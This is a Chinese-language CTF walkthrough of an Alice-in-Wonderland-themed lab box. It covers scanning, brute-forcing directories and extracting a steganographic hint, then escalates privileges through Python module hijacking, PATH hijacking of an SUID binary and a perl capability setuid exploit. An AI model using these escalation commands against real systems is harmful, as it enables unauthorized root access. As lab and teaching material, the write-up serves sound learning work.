export ip=target_ip

端口扫描

nmap -p- -T4 -sC -sV -vvv nmap/scan $ip
发现22和80端口

gobuster扫描路径

  • 第一种gobuster dir -u http://$ip/r/a -w /usr/share/wordlists/dirb/common.txt -t 100,发现/img,/r,重复对/r进行bobuster爆破又发现了/a,
    一直可以重复爆破到/r/a/b/b/i/t,可以进入一个页面,查看源码可以发现一个账号密码,ssh 登录。
  • 第二种 下载下来/img 的三张照片可能隐藏了信息,可以使用steghide extract -sf white_rabbit_1.jpeg ,默认密码为空,进入提取隐藏信息,cat hint.txt 可以发现内容 /r/a/b/b/i/t/

linux 提权

登录成功后为alice用户,sudo -l,发现一个python 脚本为rabbit 用户共同执行权限,查看python脚本文件内容发现导入了random模块,因此可以自定义一个random.py模块写入

import os
os.system("/bin/bash")

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py 执行成功后就获得了rabbit权限,进入rabbit用户目录发现一个二进制执行文件,而且是suid文件,执行python3 -m http.server 8080,然后在kali电脑中下载此文件,利用strings 查看二进制发现调用了date 程序,剩下就是常规套路,自定义date程序,写入shell,修改环境变量,执行进入shell,进入了之后又是hatter用户,并不是root用户。执行一下linenum.sh扫描发现了Perl Capabilities 漏洞,而且是root权限,执行`

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
````

就获得了root权限

### 总结

设计到了图片隐藏信息,gobuster地址不断累加,linux提取 python 模块覆盖,二进制调用模块覆盖,和Capabilities漏洞
最后修改:2021 年 09 月 14 日
如果觉得我的文章对你有用,请随意赞赏